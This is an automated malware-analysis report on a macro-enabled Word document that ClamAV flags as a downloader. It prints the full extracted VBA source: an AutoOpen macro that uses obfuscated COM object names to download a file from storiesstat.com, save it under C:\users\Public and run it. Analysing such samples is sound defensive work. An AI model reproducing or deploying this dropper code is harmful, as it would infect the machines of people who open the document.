MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.BlueWord-9845926-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.BlueWord-9845926-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
f = ExceptionRightProcedure.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ExceptionRightProcedure = CreateObject(LoadIterator) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2260 bytes |
SHA-256: 95e176bd48e08c6b2b6eef76544ea2865b1b2d5ade90842ad30956d9cfc2fe2f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
InstrumentationUtil.CheckBox1_Click
End Sub
Attribute VB_Name = "InstrumentationUtil"
Attribute VB_Base = "0{4F04565A-2395-47BD-B66D-3E6B3FED7C7E}{9619BC4D-5A03-4ACF-9E24-EC5A4C51491A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public DocumentTemp
Public ProcFuncLib
Public CountCopy32
Public Sub CheckBox1_Click()
ListBox1.AddItem (CommandButton1.Tag)
ListBox1.AddItem (CheckBox1.Tag)
CommandButton1_Click
ListBox1_Click
End Sub
Private Sub CommandButton1_Click()
ListBox1.AddItem (Image1.ControlTipText)
ListBox1.AddItem ("://storiesstat.com/header.jpg")
End Sub
Private Sub ListBox1_Click()
InstrumentationUtil.DocumentTemp = "C:\users\Public\" + "ptz.jpg"
InstrumentationUtil.ProcFuncLib = "http"
InstrumentationUtil.CountCopy32 = "GET"
TmpListboxPaste = 1
Dim ExceptionRightProcedure As Object
Dim Convert32Argument As Object
For Each LoadIterator In ListBox1.List
If TmpListboxPaste = Len("Z") Then
Set ExceptionRightProcedure = CreateObject(LoadIterator)
ExceptionRightProcedure.Open InstrumentationUtil.CountCopy32, InstrumentationUtil.ProcFuncLib & ListBox1.List(3), False
ExceptionRightProcedure.Send
End If
If TmpListboxPaste = Len("ZZ") Then
Set Convert32Argument = CreateObject(LoadIterator & "am")
Convert32Argument.Open
Convert32Argument.Type = Len("Z")
f = ExceptionRightProcedure.ResponseBody
Convert32Argument.Write f
Convert32Argument.SaveToFile InstrumentationUtil.DocumentTemp, 2
End If
If TmpListboxPaste = Len("ZZZ") Then
Shell% (LoadIterator + " " & InstrumentationUtil.DocumentTemp)
End If
TmpListboxPaste = TmpListboxPaste + 1
Next
End Sub
Private Sub skuid_Change()
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 96256 bytes |
SHA-256: 1cfd0f3a6ff718ce1692bc04c3d07df13d8da615c8506334ae95c1f09a3384ac |
|||
|
Detection
ClamAV:
Doc.Downloader.BlueWord-9845926-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.